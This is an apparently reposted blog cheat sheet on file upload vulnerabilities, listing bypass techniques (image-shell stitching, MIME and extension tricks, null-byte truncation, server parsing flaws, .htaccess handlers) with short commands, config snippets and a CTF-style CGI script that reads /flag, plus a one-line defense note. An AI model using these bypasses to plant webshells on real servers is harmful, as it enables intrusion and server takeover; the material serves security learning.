File upload summary

Enterprise 2020-09-14 05:58:56 views: null

File Upload

1. Principle

When using the upload function, there is no strict inspection of the uploaded files, resulting in malicious scripts that can be executed by the attackers.

2. Harm

Upload webshell, get server permissions

3. Judgment and possible location

a. Judgment

Can upload, can find the path, can execute

b. Possible location

Any upload point, database backup, edit template.

4. Basic use

Upload the file, find the upload path, find a way to execute the script

5.bypass

  • a. File header detection---use the picture horse, use the copy command to stitch the picture and the pony together and upload it. 
    copy 1.gif/b + shell1.php/a shell2.php
  • b. Client-side js detection---disable js or upload .jpg files and change them to php in burp.
  • c. Blacklist detection --- Use undetected suffixes, such as Asp, Aspx, asa, phtml, etc.
  • d. MIME type detection --- Modify the Content-type in the request header to image/jpg in burp
  • e. Use 00 to cut off-upload 1.php+jpg and change + to 00 in burp (requires php version less than 5.2)
  • f. Exploit analysis vulnerabilities:
    iis6.0 analysis vulnerabilities---1.asp;xx.jpg
    ii7.0/7.5 analysis vulnerabilities/Nginx analysis vulnerabilities---www.wenjian.com/test.jpg/noexist.php (test Put php code in .jpg, noexist.php may not exist)
    Apache file parsing vulnerability --- upload webshell.php.aa.bb (Apache encounters an unknown extension, it will parse from the back forward, which can be used to bypass Blacklisted)
  • g. Content detection---Use a shell without numeric characters, use commas instead of semicolons, and use = instead of php
  • h. Secondary rendering bypass---upload pictures will be rendered, download the picture to observe the rendered part, and put a sentence in the unmodified part.
  • i. Coordinating documents include use
  • j.htaccsess upload
    upload .htaccess files, file upload shell, the shell server will parse the file to php form
    <FilesMatch "shell">  #shell为文件名
SetHandler application/x-httpd-php
</FilesMatch>

    Use htaccess to start cgi, execute bash scripts, upload .htaccess and solve.sh files.
    htaccess

    Options +ExecCGI
AddHandler cgi-script .sh

    solve.sh

    #!/bin/bash
echo "Content-Type: text/plain"
cat /flag
exit 0

    6. Defense

    Verify the upload path and randomly rename the uploaded files. The upload path prohibits execution permissions.

Guess you like

Origin blog.51cto.com/14930083/2532530
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com